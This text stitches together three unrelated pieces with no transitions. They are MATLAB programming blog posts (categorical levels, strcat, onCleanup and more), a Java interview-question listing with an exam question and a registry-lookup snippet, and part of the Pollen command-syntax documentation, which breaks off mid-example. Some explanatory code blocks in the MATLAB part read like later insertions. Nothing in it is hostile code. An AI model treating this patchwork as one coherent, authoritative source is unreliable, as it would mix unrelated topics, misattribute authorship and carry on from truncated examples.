2. save(), who(), whos(): basically anything that takes variable names as input and acts on the requested variables violates transparency, because it has the effect of evalin().
I guess the save() function chose to use variable names instead of the actual variables as input because copy-on-write wasn't available in the early days of MATLAB. An example workaround would be:

function save_transparent(filename, varargin)
    VN = arrayfun(@inputname, (2:nargin)', 'UniformOutput', false);
    if( any( cellfun(@isempty, VN) ) )
        error('All variables to save must be named. Cannot be temporaries');
    end
    S = cell2struct(varargin(:), VN, 1);
    save(filename, '-struct', 'S');
end

function save_struct_transparent(filename, S)
    save(filename, '-struct', 'S');
end

The good practices that avoid non-transparent load/save also reduce namespace pollution. For example, inputname() peeks into the caller to see what the variable names are, which should not be used lightly. The example above is one of the few uses that I consider justified. I've seen novices abusing inputname() because they were not comfortable with cells and structs yet, making it a total mindfuck to reason through.

Switch between 32-bit and 64-bit user-written software like CVX

CVX is a very convenient convex optimization package that allows the user to specify the optimization objective and constraints directly, instead of manually manipulating them (by various transformations) into forms that are accepted by commonly available software like quadprog(). What I want to show today is not CVX, but a technique to handle the many different versions of the same program targeted at each system architecture (32/64-bit, Windows/Mac/Linux). Here's a snapshot of what's available with CVX:

OS       32/64   mexext      Download link
Linux    32-bit  mexglx      cvx-glx.zip
Linux    64-bit  mexa64      cvx-a64.zip
Mac      32-bit  mexmaci     cvx-maci.zip
Mac      64-bit  mexmaci64   cvx-maci64.zip
Windows  32-bit  mexw32      cvx-w32.zip
Windows  64-bit  mexw64      cvx-w64.zip

You can download all packages for the different architectures, but make a folder for each of them named by its mexext() value. For example, the 32-bit Windows implementation can go under /mexw32/cvx. Then you can programmatically initialize the right package, say in your startup.m file:

run( fullfile(yourLibrary, mexext(), 'cvx', 'cvx_startup.m') );

I intentionally put the /[mexext()] level above /cvx, not the other way round, because if you have many different software packages and want to include them in the path, you can do it in one shot without filtering for the platform names:
Turns out it’s a horrible idea to expose the raw levels when dead levels are allowed! Unless you are dealing with the internals of categorical objects, there’s very little reason why one would care or want to know about the dead levels (it’s just a cache for performance). It’s the active levels that are currently mapped to some elements that matters when user make such queries, which is handled correctly by unique(). If there are no dead levels, getlevels() is equivalent to unique(), while categorical() and getlabels() are equivalent to unique(cellstr()), but I’m very likely to run into dead levels because I delete rows of data when I filter by certain criterion. My first take on it would be to hide getlevels()/getlabels()/categories() from users. But over the years, I’ve grown from a conservative software point of view to accepting more liberal approach, especially after exposure to functional programming ideas. That means I’d rather have a way to know what’s going on inside (keep those functions there), but I’d like to be warned that it’s an evil feature that shouldn’t be used lightly. Yes, I’m dissing the use of getlevels()/getlabels()/categories() like the infamous eval(). Once in a long while, it might be a legitimate neat approach. But for 99% of the time, it’s a strictly worse solution that causes a lot of damages. It’s way more unlikely that getlevels()/getlabels()/categories() will yield what you really mean with dead levels than multiple inheritance in C++ being the right approach on the first try. If I use unique() all the time, why would I even bother to talk about getlevels()/getlabels()/categories() since I never used them? It’s because TMW didn’t warn users about the dangers in their documentation. These methods looks legit and innocent, but it’s a usage trap like returning stack pointers in C/C++ (you can technically do it, but with almost 100% certainty, you are telling the computer to do something you don’t mean to, in short: wrong). I have two encounters that other people using the raw categorical levels that harmed me: 1. One of my coworkers spoke against upgrading our MATLAB licenses (later withdrew his opposition) because the new versions breaks his old code involving nominal()/ordinal() objects.I was perplexed because it didn’t break any of my code despite I used more nominal() and ordinal() objects than anybody in my vicinity. On close inspection, he was using getlevels() and getlabels() all over the place instead of unique(), which works seamlessly in the new MATLAB. Remember I mentioned that the internal design/implementation details of nominal()/ordinal() changed in MATLAB R2013a? The internal treatment of dead levels has changed. The change was supposed to be irrelevant to end-users by design if getlevels()/getlabels() had not expose dead levels to end-users. Because of the oversight, users have written code that depends on how dead levels are internally handled! 2. The default factory-shipped grpstats() is still ‘broken’ as of R2015b! If you feed grpstats() with a nominal grouping variable, it will give you lines of NaN because it was programmed to spit out one row for each level (dead or alive) in the grouping variable. Since the dead levels has nothing to group by the reduction function (@mean if not specified), it spits out multiple NaNs as by definition NaN do not equal to anything else, including NaN itself. 
This is traced to how grp2idx() is used internally: if the grouping variable is a cellstr() or double(), the groups are generated using unique(), so there are no dead levels whatsoever. But if the grouping variable is a categorical, the developers thought their job was already done and just took the levels directly from the categorical object's properties by calling getlabels() and getlevels():

gidx = double(s);
...
gnames = getlabels(s)';
glevels = getlevels(s)';

Apparently the author of the factory-shipped code forgot that there's a reason why categorical/unique() has the same function name as double/unique() and cellstr/unique(): the point of overloading is to have the same function name for the same intention! The intention of unique() should be applied uniformly across all applicable data types. Think twice before relying on language support for type info (like type traits in C++) to switch code when you can use overloading (MATLAB) / polymorphism (C++). A good architecture should lead you to the correct code logic without the need to override good practices.

Rants aside, grpstats() will work as intended if those lines in grp2idx() are changed to:

gidx = double(s);
...
glevels = unique(s(:));
gnames = cellstr(glevels);

A higher-level fix would be applying grp2idx() to the grouping variable before it is fed into grpstats():

grpstats(X, grp2idx(g), ...)

The rationale is that the underlying contents don't matter for grouping variables as long as each of them uniquely stands for the group it represents! In other words, categorical() objects are seen as nothing but a bunch of integers, which can be obtained by casting to double():

gidx = double(s);
grpstats(X, gidx, ...)

This is what grp2idx() calls under the hood anyway when it sees a categorical. The grp2idx() called from grpstats() will then see a bunch of integers and will correctly apply unique() to them, thus removing all dead levels. Of course, use grp2idx() instead of double(), because it works across all applicable data types. Why future-constrain yourself when a more generic implementation is already available?

The sin committed by grpstats() over nominal() is that the variables glevels and gnames shouldn't get involved in the first place, because they don't matter and shouldn't even show up in the outputs. This is what's fundamentally wrong about it:

[group,...,ngroups] = mgrp2idx(group,rows);
...
% This code assumes there are no gaps in group levels (gnum), which is not always true.
for gnum = 1:ngroups
    groups{gnum} = find(group==gnum);
end

We can either blame the for-loop for not skipping dead levels, or blame mgrp2idx (a wrapper of grp2idx) for spitting out the dead levels. It doesn't really matter which way it is. The most important thing is that dead levels were let loose, and nobody in the developer-user chain understood the implications well enough to stop the problem from propagating to the final output.

To summarize, the raw levels in categorical objects are a dirty cache including junk you do not want 99.99% of the time. Use unique() to get the meaningful unique levels instead.

MATLAB Compatibility: nominal() and ordinal() objects since R2013a are not compatible with R2012b and before

In the old days (before R2013a), nominal() and ordinal() were separate parallel classes with astoundingly similar structures. That means there was a lot of copy-paste-mod going on. TMW improved on it by consolidating the ideas into a new categorical() class, from which nominal() and ordinal() now derive.
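A quick way to see this post-R2013a consolidation for yourself is to query the class hierarchy directly; this is a hedged sketch and the exact display text may vary by release:

    % In R2013a and later, nominal and ordinal are thin subclasses of categorical.
    n = nominal({'a', 'b', 'a'});
    o = ordinal([1 2 3], {'low', 'mid', 'high'});
    isa(n, 'categorical')    % true in the consolidated class hierarchy
    isa(o, 'categorical')    % true as well
    superclasses('nominal')  % lists categorical among the parent classes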
The documentation mentioned that nominal() and ordinal() might be deprecated in the future, but I contacted their support urging them not to. It’s not for compatibility reasons: nominal() and ordinal() captures the common use cases that these two ideas do not need to be unified, and the names themselves clearly encodes the intention. If the user want to exploit the commonalities between the two, either it’s already taken care of by the parent’s public methods, or the object can be sliced to make it happen. I looked into the source code for nominal() and ordinal(): it’s pretty much a wrapper over categorical’s methods yet the interface (input arguments) are much simpler and intuitive because we don’t have to consider all the more general cases. Back to the titled topic. Because categorical()’s properties (members) are different from pre R2013a’s nominal() and ordinal() objects, the objects created in R2012b or before cannot be loaded correctly in newer versions. That means the backward compatibility is completely broken for nominal()/ordinal() as far as saved objects are concerned. There’s no good incentive to solve this problem on the TMWs side because the old nominal()/ordinal() is short-lived and they always want everybody to upgrade. Since I use nominal() most of the time and the ones that really need to be saved are all nominal(), I recommend the converting (‘casting’) them to cellstr by >> A = nominal({'a','a','b','c'}); >> A = cellstr(A) A = 'a' 'a' 'b' 'c' Remember, nominal() is pretty much compressing a ton of cellstr into a few unique items and mapping the indices. No information is lost going back and forth between cellstr() and nominal(). It’s just a little extra computations for the conversion. As for ordinal(), I rarely need to save it because order/level assignment is almost the very last thing in the processing chain because it changes so frequently (e.g. how would you draw the lines for six levels of fatness?), I might as well just not save it and reprocess the last step (where the code with ordinal() sits) when I need it. Nonetheless, if you still want to save ordinals() instead of re-crunching it, this time you’ll want to save it as numerical levels by casting the ordinal() into double(): >> A = ordinal([1 2 3; 3 2 1; 2 1 3],{'low' 'medium' 'high'}, [3 1 2]) A = medium high low low high medium high medium low >> D = double(A) D = 2 3 1 1 3 2 3 2 1 >> U = unique(A) U = low medium high >> L = cellstr(U) L = 'low' 'medium' 'high' >> I = double(U) I = 1 2 3 >> A_reconstructed = ordinal(D, L, I) A_reconstructed = medium high low low high medium high medium low You’ll save (D, L, I) from old MATLAB and load it and reconstruct it with the triplets from the new MATLAB (I’d suggest using structs to keep track of the triplets). I know it’s a hairy mess!   498 total views, no views today MATLAB Gotchas: Adding whitespace in strcat() strcat() is a very handy function in MATLAB that allows you to combine strings using a mixture of cellstr() and char strings and it will auto-expand the char strings to match the cellstr() if necessary. However, by design intention, strcat() removes trailing white spaces by internally applying deblank() to all char string inputs. It does NOT deblank cellstr() inputs. 
So if you want to combine date and time with a space, you have to use {' '} instead of ' ':

date = '2000-01-01';
time = '00:00:01';

>> strcat(date, ' ', time)   % the char ' ' is deblanked and therefore ignored
ans =
2000-01-0100:00:01

>> strcat(date, {' '}, time) % the cell {' '} is NOT deblanked, so the space survives
ans =
    '2000-01-01 00:00:01'

I find this more confusing than helpful. Like other users, I naturally resort to processing line by line using cellfun() or other tricks just to get around the deblank() problem without taking a second look at the documentation, because
• rolling our own implementation is only marginally more annoying than the deblank() behavior, and
• we expect cellstr() to match the dimensions without auto-expanding; I naturally thought it would expand only if it's a char string.
Somebody asked this question on the newsgroup before, so obviously it's not an intuitive design. It makes sense to do it the way MATLAB designed strcat(), because we need some way to tell MATLAB whether we want our inputs deblanked or not. I think it would be more intuitive to have MATLAB's default strcat() not deblank() char strings at all, and have a strcat_deblanked() that deblanks the inputs before feeding them into strcat(). Unfortunately, this behavior has been there for a long time, so it's too late to change it without affecting compatibility. Might as well live with it, but this is one of the very few unnatural (or slightly illogical) design choices of MATLAB to keep in mind.

MATLAB Features: Persistent Excel ActiveX (DCOM) for xlsread() and xlswrite() in R2015b

xlsread() and everything that calls it, such as readtable(), is terribly slow, especially when you have a boatload of Excel files to process. The reason behind it is that xlsread() closes the DCOM handle (which closes the Excel COM session) after it finishes, and restarts Excel (DCOM) again the next time you call xlsread() to load another spreadsheet file. That means there's a lot of opening and closing of the Excel application if you process multiple spreadsheets. The better strategy, which is covered extensively on MATLAB's File Exchange (FEX), is to have your program open one Excel handle and process all the spreadsheets within the same DCOM handle before closing it. This strategy is quite overwhelming for a beginner, and even if you use FEX entries, you still cannot get around the fact that you have to know there's a handle that manages the Excel session, and remember to close it after you are done with it. Nothing beats having xlsread() do it automatically for you.

Starting with R2015b, the Excel DCOM handle used by xlsread() is persistent: after you make the first call to xlsread(), Excel.exe stays in memory unless you explicitly clear persistent variables or exit MATLAB, so it can be reused every time xlsread() or xlswrite() is called. Finally! The code itself is pretty slick. You can find it in 'matlab.io.internal.getExcelInstance()'. Well, I guess it's not hard to come up with it, but in TMW they must have had a heated debate about whether it's a good idea to keep Excel around (taking up resources) when you are done with it. With the computation power required to run R2015b, an extra Excel.exe lying around should be insignificant. Good call!

MATLAB Techniques: Who's your daddy? Ask dbstack().
Unusual uses of dbstack() Normally having your function know about its caller (other than through the arguments we pass onto the stack) is usually a very bad idea in program organization, because it introduces unnecessary coupling and hinders visibility. Nonetheless, debugger is a built-in feature of MATLAB and it provides dbstack() so you have access to your call stack as part of your program. Normally, I couldn’t come up with legitimate uses of it outside debugging. One day, I was trying to write a wrapper function that does the idiom (mentioned in my earlier blog post) fileparts( mfilename('fullpath') ); because I want the code to be self-documenting. Let’s call the function mfilepath(). Turns out it’s a difficult problem because mfilename(‘fullpath’) reports the path of the current function executing it. In the case of a wrapper, it’s the path of the wrapper function, not its caller that you are hoping to extract its path from. In other words, if you write a wrapper function, it’s the second layer of the stack that you are interested in. So it can be done with dbstack(): function p = mfullpath() ST = dbstack('completenames'); try p = ST(2).file; catch p = ''; end Since exception handling is tightly knit into MATLAB (unlike C++, which you pay for the extra overhead), there aren’t much performance penalty to use a try…catch() block than if I checked if ST actually have a second layer (i.e. has a non-base caller). I can confidently do that because there is only one way for this ST(2).file access operation to fail: mfullpath() is called from the base workspace. Speaking of catchy titles, I wonder why Loren Shure, a self-proclaimed lover of puns and the blogger of the Art of MATLAB, haven’t exploited the built-in functions ‘who’ and ‘whos’ in her April Fools jokes like whos your daddy who let the dogs out Note that these are legitimate MATLAB syntax that won’t throw you an exception. Unless you have ‘your’, ‘daddy’, ‘let’, ‘the’, ‘dogs’, ‘out’ as variable names, the above will quietly show nothing. It’d be hilarious if they pass that as an easter egg in the official MATLAB. They already have ‘why’, why not Error using rng (line 125) First input must be a nonnegative integer seed less than 2^32, 'shuffle', 'default', or generator settings captured previously using S = RNG. Error in why (line 10) dflt = rng(n,'v5uniform');       606 total views, no views today MATLAB Quirks: struct with no fields are not empty As far as struct() is concerned, I’m more inclined to using Struct of Array (SoA) over Array of Structs (AoS), unless all the use cases screams for SoA. Performance and memory overhead are the obvious reasons, but the true motivation for me to use SoA is that I’m thinking in terms of table-oriented programming (which I’ll discuss in later posts. See table() objects.): each field of a struct is a column in a table (heterogeneous array). Since a table() is considered empty (by isempty()) if it has EITHER 0 rows INCLUSIVE OR 0 columns (no fields) and the default constructor creates a 0 \times 0 table, I thought struct() would do the same. NOT TRUE! First of all, the default constructor of struct() gives ONE struct with NO FIELDS (so it’s supposed to correspond to a 1 \times 0 table). What’s even harder to remember is that struct2table(struct()) gives a 0 \times 0 table. The second thing I missed is that a struct() with NO fields is NOT empty. You can have 3 structs with NO fields! So isempty(struct()) is always false! 
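A minimal sketch of the quirk just described, illustrating why the field-less default struct is not empty while struct([]) is:

    % The default constructor gives a 1x1 struct with no fields -- not empty.
    s = struct();
    isempty(s)             % false: it is 1x1, merely field-less
    size(s)                % [1 1]
    numel(fieldnames(s))   % 0 fields
    % A truly empty struct needs struct([]):
    e = struct([]);
    isempty(e)             % true: 0x0 struct array with no fields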
I usually run into this problem when I want to seed the execution with an empty struct() and have the loop expand the fields if the file has contents in it, and I’ll check if the seeded struct was untouched to see if I can read data from the file. Next time I will remember to call struct([]) instead of struct(). What a trap! At the end of the day, while struct is powerful, but I rarely find AoS necessary to do what I wanted once table() is out. AoS has pretty much the same restrictions as in table() that you cannot put different types in the same field across the AoS, but table allows you to index with variables (struct’s field) or rows (struct array index) without changing the data structure (AoS <-> SoA). So unless it’s a performance critical piece of the code, I’ll stick with tables() for most of my struct() needs.   2,358 total views, 4 views today MATLAB Techniques: onCleanup() ‘destructor’ If your program opens a file, creates a timer(), or whatever resources that needs to be closed when they are no longer needed, before R2008a, you have to put your close resource calls at two places: one at the end of successful execution, the other at the exception handling in try…catch block: FID = fopen('a.txt') try // ... do something here fclose(FID); catch fclose(FID); end Not only it’s messy that you have to duplicate your code, it’s also error prone when you add code in between. If your true intention is to close the resource whenever you exit the current program scope, there’s a better way for you: onCleanup() object. The code above can be simplified as: FID = fopen('a.txt') obj = onCleanup(@() fclose(FID)); // ... do something with FID here The way onCleanup() works is that it creates an object which you define what its destructor (delete()) does on creation (by the constructor of course) by specifying a function handle. This way when ‘obj’ is cleared (either as it goes out of scope or your explicitly cleared it with ‘clear’), the destructor in ‘obj’ will be activated and do the cleanup actions you specified. Due to copyright reasons, I won’t copy the simple code here. Just open onCleanup.m in MATLAB editor and you’ll see it that the code (excluding comments) has less words than the description above. Pretty neat! Normally we use onCleanup() inside a function. The best place to put is is right after you opened a resource because anything in between can go wrong (i.e. might throw exceptions): you want ‘obj’ to be swept (i.e. its destructors called) when that happens. Technically, you can make an onCleanup() object in the base (root) workspace (aka command window). The destructor will be triggered either when you clear the ‘obj’ explicitly using ‘clear’ or when you exit MATLAB. You can see for yourself with this: obj = onCleanup(@() pause); It kind of let you do a one-off cleanup on exit instead of a recurring cleanup in finish.m. So the next time you open a resource that needs to be closed whether the program exits unexpectedly or not, use onCleanup()! It’s one of the elegant, smart uses of OOP.   875 total views, 2 views today
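As a closing illustration of the onCleanup() pattern discussed in the last section, here is a hedged sketch that ties a temporary scratch folder to an onCleanup() object; the function name and the work done inside it are made up purely for illustration:

    function process_in_tempdir()
        % Sketch only: create a scratch folder and guarantee its removal on any exit path.
        scratch = tempname();                          % hypothetical scratch location
        mkdir(scratch);
        cleaner = onCleanup(@() rmdir(scratch, 's'));  % destructor fires on return or error
        % ... do work that may throw ...
        data = rand(10);
        save(fullfile(scratch, 'work.mat'), 'data');
        % No explicit rmdir needed: 'cleaner' going out of scope removes the folder.
    end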
Java J2EE Interview Questions

Answered questions (companies where asked; answers; views):

What is garbage collection in Java, and how can it be used? (Infosys, HCL, Accenture, Wipro, Sara, SITS, TCS; 32 answers; 58687 views)
Differentiate Vector and ArrayList. (Wipro, Max Telecom; 6 answers; 8492 views)
Differentiate a constructor and a method. How is each used? (Wipro; 7 answers; 9023 views)
What is an abstract class? (Wipro, DBS; 7 answers; 7857 views)
How can a final class be used? (Wipro, Accenture; 5 answers; 9800 views)
What default value is assigned to an object reference declared as an instance variable? (Wipro; 1 answer; 11036 views)
What type of parameter passing does Java support? (Wipro; 7 answers; 12384 views)
Explain the term serialization. (Wipro; 10 answers; 10229 views)
Is there any error if you have multiple main methods in the same class? (Wipro, Infosys; 10 answers; 11545 views)
What is overriding and how can it be used? (Consagous, Wipro; 7 answers; 13937 views)
How is serialization generally used? (3 answers; 4838 views)
How are Swing and AWT differentiated? (Wipro; 3 answers; 6127 views)
Explain pass by reference and pass by value. (IBM, Wipro; 8 answers; 12442 views)
In which way is a primitive data type passed? (Sun Microsystems; 5 answers; 8139 views)
What happens when a main method is declared as private? (L&T, DELL, Infosys, Sun Microsystems; 22 answers; 38038 views)

Un-Answered Questions { Java J2EE }

Question 5 [15] Consider the following classes, illustrating the Strategy design pattern:

import java.awt.*;

abstract class Text {
    protected TextApplet tA;
    protected Text(TextApplet tApplet) { tA = tApplet; }
    abstract public void draw(Graphics g);
}

class PlainText extends Text {
    protected PlainText(TextApplet tApplet) { super(tApplet); }
    public void draw(Graphics g) {
        g.setColor(tA.getColor());
        g.setFont(new Font("Sans-serif", Font.PLAIN, 12));
        g.drawString(tA.getText(), 20, 20);
    }
}

class CodeText extends Text {
    protected CodeText(TextApplet tApplet) { super(tApplet); }
    public void draw(Graphics g) {
        g.setColor(tA.getColor());
        g.setFont(new Font("Monospaced", Font.PLAIN, 12));
        g.drawString(tA.getText(), 20, 20);
    }
}

public class TextApplet extends java.applet.Applet {
    protected Text text;
    protected String textVal;
    protected Color color;

    public String getText() { return textVal; }
    public Color getColor() { return color; }

    public void init() {
        textVal = getParameter("text");
        String textStyle = getParameter("style");
        String textColor = getParameter("color");
        if (textStyle == "code") text = new CodeText(this);
        else text = new PlainText(this);
        if (textColor == "red") color = Color.RED;
        else if (textColor == "blue") color = Color.BLUE;
        else color = Color.BLACK;
    }

    public void paint(Graphics g) {
        text.draw(g);
    }
}

The Text class is more complicated than it should be (there is too much coupling between the Text and TextApplet classes). By getting rid of the reference to a TextApplet object in the Text class and setting the colour in the paint() method, one could turn the Text class into an interface and simplify the strategy classes considerably.
5.1 Rewrite the Text and PlainText classes to do what is described above. (6)
5.2 Explain the consequent changes that are necessary to the TextApplet class. (4)
5.3 Write an additional strategy class called FancyText (to go with your simplified strategy classes) to allow fancy text to be displayed for the value "fancy" provided for the style parameter. It should use the font Font("Serif", Font.ITALIC, 12). (3)
5.4 Explain what changes are necessary to the TextApplet class for this. (2)
(1034 views)

What is a portable component? (861 views)
What is a policy? (1088 views)
How is final different from finally and finalize in Java? (1 view)
Difference between mqconn and mqconnx? (1 view)
What are MQ objects? (1 view)
How to debug applications in message flow? (1 view)
When should a function throw an exception? (2 views)
Is there any way to find whether software installed in the system is registered by just providing the .exe file? I have tried the following code, but it is just displaying the directory structure in the registry. Here is the code:

package com.msi.intaller;

import java.util.Iterator;
import ca.beq.util.win32.registry.RegistryKey;
import ca.beq.util.win32.registry.RootKey;

public class RegistryFinder {
    public static void main(String... args) throws Exception {
        RegistryKey.initialize(RegistryFinder.class.getResource("jRegistryKey.dll").getFile());
        RegistryKey key = new RegistryKey(RootKey.HKLM, "Software\\ODBC");
        for (Iterator subkeys = key.subkeys(); subkeys.hasNext();) {
            RegistryKey subkey = subkeys.next();
            System.out.println(subkey.getName());
            // You need to check here if there's anything which matches "Mozilla FireFox".
        }
    }
}

(774 views)
In EJB declare the static methods are not? (2162 views)
How to display names of all components in a Container? (1882 views)
What is session in Java? (1 view)
What is JMS API Architecture? (433 views)
What is the broker domain? (1 view)
What is meant by OLE? Please answer me. Advance thanks. (1577 views)
12 Pollen command syntax

12.1 The golden rule

Pollen uses a special character — the lozenge, which looks like this: ◊ — to mark commands within a Pollen source file. So when you put a ◊ in your source, whatever comes next will be treated as a command. If you don't, it will just be interpreted as plain text.

12.2 The lozenge (◊)

I chose the lozenge as the command character because a) it appears in almost every font, b) it's barely used in ordinary typesetting, c) it's not used in any programming language that I know of, and d) its shape and color allow it to stand out easily in code without being distracting.

If you're using DrRacket, you can use the Insert Command Char button at the top of the editing window to — you guessed it — insert the command character. If you're using a different editor, here's how you type it:

Mac: Option + Shift + V
Windows: holding down Alt, type 9674 on the num pad
GNU/Linux, BSD: Type Ctrl + Shift + U, then 25CA, then Enter

For more information on entering arbitrary Unicode glyphs, see Wikipedia.

12.2.1 "But I don't want to use it ..."

Fine, but you have to pick something as your command character. If you don't like this one, you can override it within a project — see How to override setup values. Still, it's not like I'm asking you to learn APL. Racket supports Unicode, so it's a little silly to artificially limit ourselves to ASCII. My advice: don't knock the lozenge till you try it.

12.2.2 Lozenge helpers

12.2.2.1 How MB types the lozenge

I work on Mac OS. I use Typinator to assign the ◊ character to the otherwise never-used Option + Shift + backslash key combo (ordinarily assigned to »). For that matter, I assign λ to Option + backslash (ordinarily assigned to «).

12.2.2.2 DrRacket toolbar button

When you use DrRacket, you'll see a button in the toolbar that says Insert command char. This will insert the lozenge (or whatever command character you've defined for your project).

12.2.2.3 DrRacket key shortcut

Courtesy of Phil Jones: "I created a file called "keys.rkt"

#lang s-exp framework/keybinding-lang

(keybinding "c:<" (λ (editor evt) (send editor insert "◊")))

— and loaded it into DrRacket with Edit | Keybindings | Add user-defined keybindings .... Now I can use ctrl + shift + < to put the lozenge in." See also Defining Custom Shortcuts in the DrRacket documentation.

12.2.2.4 AHK script for Windows

Courtesy of Matt Wilkie: "Here's a working AHK script to have double-tap backtick send the lozenge character.
It took way more time than I want to think about, once started I couldn’t let go.” ; ; Double-tap backtick sends Pollen command character (◊) ; For some reason I needed to use Unicode 'U+25CA' ; instead of the standard alt-code '9674' ; ; Adapted from http://ahkscript.org/docs/commands/SetTimer.htm ; and http://www.autohotkey.com/board/topic/145507-how-to-use-double-tap-backtick-with-pass-through/ ; #EscapeChar \ $`:: if winc_presses > 0     {winc_presses += 1     return     }   winc_presses = 1 SetTimer, TheKey, 250 ; Wait for more presses, in milliseconds return   TheKey:     SetTimer, TheKey, off     if winc_presses = 1 ; The key was pressed once.         {Send `         }     else if winc_presses = 2 ; The key was pressed twice.         {Send {U+25CA}         }   ; Regardless of which action above was triggered, reset the count to ; prepare for the next series of presses: winc_presses = 0 return An alternative, courtesy of Eli Barzilay: “this turns M-\ to the lozenge”: !\:: Send {U+25CA} 12.2.2.5 Emacs script Courtesy of Richard Le: “I chose M-\ because that’s the key for the lambda character in DrRacket.” (Eli Barzilay shortened it.) (global-set-key "\M-\\" "◊") 12.2.2.6 Emacs input method Courtesy of Kristoffer Haugsbakk: “Press C-\ rfc1345 RET to choose the rfc1345 input method and toggle it on. When this input method is toggled, can be produced by entering &LZ. The input method can be toggled on and off with C-\.” 12.2.2.7 Vim (and Evil) digraph sequence Courtesy of Kristoffer Haugsbakk: “While in insert mode in Vim, or insert state in Evil (Emacs), press C-k LZ to enter . C-k lets you enter a digraph (in Vim terminology) which maps to another character. In this case, the digraph LZ maps to . To make another mapping for this character in Vim, execute the following command: :digraphs ll 9674 to (in this case) use the digraph ll. 9674 is the decimal representation of in Unicode.” 12.2.2.8 Compose key Courtesy of Reuben Thomas: “When using X11 (common on GNU/Linux and BSD systems), one can use the Compose key. It is often disabled by default; check your desktop environment’s keyboard settings, or at a lower level, to use the Menu key as the Compose key: setxkbmap -option compose:menu See man xkeyboard-config for all the ready-made options for the compose key. Since the lozenge character does not exist in the default compose-mapping file, you need to add this to your "~/.XCompose": <Multi_key> <l> <l> : "◊" See man XCompose, or for more details, including many additional Compose bindings, see pointless-xcompose.” 12.3 The two command styles: Pollen style & Racket style Pollen commands can be entered in one of two styles: Pollen style or Racket style. Both styles start with a lozenge ():  command name [ Racket arguments ... ] { text body ... }  ( Racket expression ) Pollen-style commands A Pollen-style command has the three possible parts after the : Each of the three parts is optional. You can also nest commands within each other. However: Here are a few examples of correct Pollen-style commands: #lang pollen variable-name tag{Text inside the tag.} tag[#:attr "value"]{Text inside the tag} get-customer-id["Brennan Huff"] tag{His ID is get-customer-id["Brennan Huff"].} And some incorrect examples: #lang pollen tag {Text inside the tag.} ; space between first and second parts tag[Text inside the tag] ; text body needs to be within braces tag{Text inside the tag}[#:attr "value"] ; wrong order The next section describes each of these parts in detail. 
Racket-style commands If you’re familiar with Racket expressions, you can use the Racket-style commands to embed them within Pollen source files. It’s simple: any Racket expression becomes a Pollen command by adding to the front. So in Racket, this code: #lang racket (define band "Level") (format "~a ~a" band (* 2 3 7)) Can be converted to Pollen like so: #lang pollen (define band "Level") (format "~a ~a" band (* 2 3 7)) And in DrRacket, they produce the same output: Level 42 Beyond that, there’s not much to say about Racket style — any valid Racket expression will also be a valid Racket-style Pollen command. The relationship of Pollen style and Racket style Even if you don’t plan to write a lot of Racket-style commands, you should be aware that under the hood, Pollen is converting all Pollen-style commands to Racket style. So a Pollen-style command that looks like this: headline[#:size 'enormous]{Man Bites Dog!} Is actually being turned into this Racket-style command: (headline #:size 'enormous "Man Bites Dog!") Thus a Pollen-style command is just an alternate way of writing a Racket-style command. (More broadly, all of Pollen is just an alternate way of using Racket.) The corollary is that you can always write Pollen commands using whichever style is more convenient or readable. For instance, the earlier example, written in the Racket style: #lang pollen (define band "Level") (format "~a ~a" band (* 2 3 7)) Can be rewritten in Pollen style: #lang pollen define[band]{Level} format["~a ~a" band (* 2 3 7)] And it will work the same way. You can combine the two styles in whatever way makes sense to you. I typically reserve Pollen-style commands for when I’m mixing commands into textual material. Meaning, I prefer ◊headline[#:size 'enormous]{Man Bites Dog!} over (headline #:size 'enormous "Man Bites Dog!"). But when I’m writing or using traditional Racket functions, I find Racket-style commands to be more readable (because they correspond to ordinary Racket syntax, and thus can be moved between Pollen and Racket source files more easily). So I prefer (define band "Level") over ◊define[band]{Level}. 12.3.1 The command name In Pollen, you’ll likely use a command for one of these purposes: Let’s look at each kind of use. 12.3.1.1 Invoking tag functions By default, Pollen treats every command name as a tag function. The default tag function creates a tagged X-expression with the command name as the tag, and the text body as the content. #lang pollen strong{Fancy Sauce, $1} '(strong "Fancy Sauce, $1") To streamline markup, Pollen doesn’t restrict you to a certain set of tags, nor does it make you define your tags ahead of time. Just type a tag, and you can start using it. #lang pollen utterly-ridiculous-tag-name{Oh really?} '(utterly-ridiculous-tag-name "Oh really?") The one restriction is that you can’t invent names for tags that are already being used for other commands. For instance, map is a name permanently reserved by the Racket function map. It’s also a rarely-used HTML tag. But gosh, you really want to use it. Problem is, if you invoke it directly, Pollen will think you mean the other map: #lang pollen map{Fancy Sauce, $1} map: arity mismatch; the expected number of arguments does not match the given number   given: 1   arguments...:     "Fancy Sauce, $1" What to do? Read on. 12.3.1.2 Invoking other functions Though every command name starts out as a default tag function, it doesn’t necessarily end there. 
You have two options for invoking other functions: defining your own, or invoking others from Racket. Defining your own functions Use the define command to create your own function for a command name. After that, when you use the command name, you’ll get the new behavior. For instance, recall this example showing the default tag-function behavior: #lang pollen strong{Fancy Sauce, $1} '(strong "Fancy Sauce, $1") We can define strong to do something else, like add to the text: #lang pollen (define (strong text) `(strong ,(format "Hey! Listen up! ~a" text))) strong{Fancy Sauce, $1} '(strong "Hey! Listen up! Fancy Sauce, $1") The replacement function has to accept any arguments that might get passed along, but it doesn’t have to do anything with them. For instance, this function definition won’t work because strong is going to get a text body that it’s not defined to handle: #lang pollen (define (strong) '(fib "1 1 2 3 5 8 13 ...")) strong{Fancy Sauce, $1} strong: arity mismatch; the expected number of arguments does not match the given number   expected: 0   given: 1   arguments...:     "Fancy Sauce, $1" Whereas in this version, strong accepts an argument called text, but then ignores it: #lang pollen (define (strong text) '(fib "1 1 2 3 5 8 13 ...")) strong{Fancy Sauce, $1} '(fib "1 1 2 3 5 8 13 ...") The text body can pass an indefinite number of arguments. A well-designed tag function should be able to handle them, unlike these synthetic examples. For a more realistic example, see The text body. You can attach any behavior to a command name. As your project evolves, you can also update the behavior of a command name. In that way, Pollen commands become a set of hooks to which you can attach more elaborate processing. Using Racket functions You aren’t limited to functions you define. Any function from Racket, or any Racket library, can be invoked directly by using it as a command name. Here’s the function range, which creates a list of numbers: #lang pollen (range 1 20) '(range 1 20) Hold on — that’s not what we want. Where’s the list of numbers? The problem here is that we forgot to import the racket/list library, which contains the definition for range. (If you need to find out what library contains a certain function, the Racket documentation will tell you.) Without racket/list, Pollen just thinks we’re trying to use range as a tag function (and if we had been, then '(range 1 20) would’ve been the right result). We fix this by using the require command to bring in the racket/list library, which contains the range we want: #lang pollen (require racket/list) (range 1 20) '(1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19) Of course, you can also invoke Racket functions indirectly, by attaching them to functions you define for command names: #lang pollen (require racket/list) (define (rick start finish) (range start finish)) (rick 1 